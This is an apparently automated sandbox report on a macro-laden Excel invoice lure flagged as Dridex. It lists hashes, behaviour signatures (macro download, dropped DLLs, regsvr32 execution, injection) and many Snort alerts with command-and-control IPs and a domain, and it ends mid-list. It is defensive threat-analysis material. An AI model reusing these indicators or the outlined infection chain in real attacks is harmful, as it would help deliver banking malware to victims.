Analysis Report 1_Total New Invoices-Thursday January 21_2021.xlsm

Overview

General Information

Sample Name:	1_Total New Invoices-Thursday January 21_2021.xlsm
Analysis ID:	342716
MD5:	a52a88ae97dd408d38d98c9aa7f81142
SHA1:	234b65bc42a077c98c61a8eb4870d41e0039013e
SHA256:	c7e6848fd63681514d6dad3032e358a257dde3aa1cd3b349306283356bca2608
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Multi AV Scanner detection for submitted file

Sigma detected: BlueMashroom DLL Load

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Regsvr32 Anomaly

Abnormal high CPU Usage

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the installation date of Windows

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Classification

Signatures

AV Detection:

Multi AV Scanner detection for submitted file

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

Virustotal: Detection: 27%

Perma Link

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49190 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49194 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49198 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49202 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49211 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49214 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49220 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49229 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49235 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49237 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49239 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49247 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49250 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49251 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49259 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49263 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49265 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49275 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49281 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49282 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49298 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49300 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49307 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49314 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49318 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49319 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49320 version: TLS 1.0

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: l3v7tq4[1].rar.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: qsf.surfescape.net

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 64.37.52.172:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 64.37.52.172:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49170
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49171
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49173
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49174
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49175
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49176
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49179
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49181
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49182
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49183
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49185
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49187
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49190
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49193
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49192
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49194
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49196
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49198
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49200
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49201
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49202
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49204
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49205
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49206
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49207
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49209
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49211
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49212
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49212
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49213
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49214
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49215
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49219
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49219
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49220
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49222
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49221
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49223
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49226
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49227
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49227
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49228
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49229
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49230
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49231
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49235
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49237
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49238
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49239
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49240
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49241
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49244
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49244
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49246
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49246
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49247
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49248
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49248
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49250
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49249
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49251
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49252
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49253
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49255
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49255
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49259
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49260
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49260
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49261
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49261
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49263
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49262
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49264
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49265
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49266
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49268
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49269
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49270
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49271
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49271
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49273
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49275
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49276
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49276
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49278
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49277
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49279
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49281
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49282
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49283
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49283
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49284
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49286
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49288
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49289
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49290
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49292
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49292
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49294
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49295
